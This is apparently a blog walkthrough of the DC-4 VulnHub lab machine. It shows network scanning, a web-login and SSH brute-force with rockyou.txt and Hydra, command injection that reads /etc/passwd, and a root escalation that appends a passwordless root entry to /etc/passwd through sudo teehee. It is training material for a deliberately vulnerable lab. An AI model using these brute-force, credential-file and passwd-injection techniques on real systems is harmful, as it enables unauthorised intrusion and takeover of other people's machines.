The first step is to get the IP of our target machine (i.e., DC-4)- The process of doing this is as follows-

Start network scan in your kali terminal with the help of ARP scan or Netdiscover

Command- arp-scan -l


In this scan we found the ip

Now lets see what is available on this ip


There is a login page which we can bruteforce by burp

As we have our target IP we will scan the ports using Nmap Command- nmap


As we can see that http and ssh are open

So lets first brute force the login page with rockyou.txt


We found username= admin, password= happy

So lets see what is inside


We have found commands running but there only 3

So we will find more commands in burp using repeater


We have found some passwords in /home/jim/backups/old-password.bak

Now for users lets find out in /etc/passwd


Here we found 3 users jim sam and Charles who have bash So lets bruteforce ssh with hydra


As now we got jim password i.e., jibril04

Let see what we got by ssh


We got an test mail which was sent from root to jim so if this is test mail Lets check if there is something interesting in /var/mail


And we got Charles password also So lets switch user

Now we know that we need root access so we will do it by Command – sudo -l


As we can see Charles has permission to use teehee without root password Now to gain root access

Command -echo “raaj::0:0:::/bin/bash” | sudo teehee -a /etc/passwd


And boom here we got flag

Kindly read other articles:

Walkthrough Of TommyBoy1

BRAINPAN: 1 Vuln Hub Machine Walkthrough

About Author

Leave a Reply

Your email address will not be published. Required fields are marked *

Open chat
Can we help you?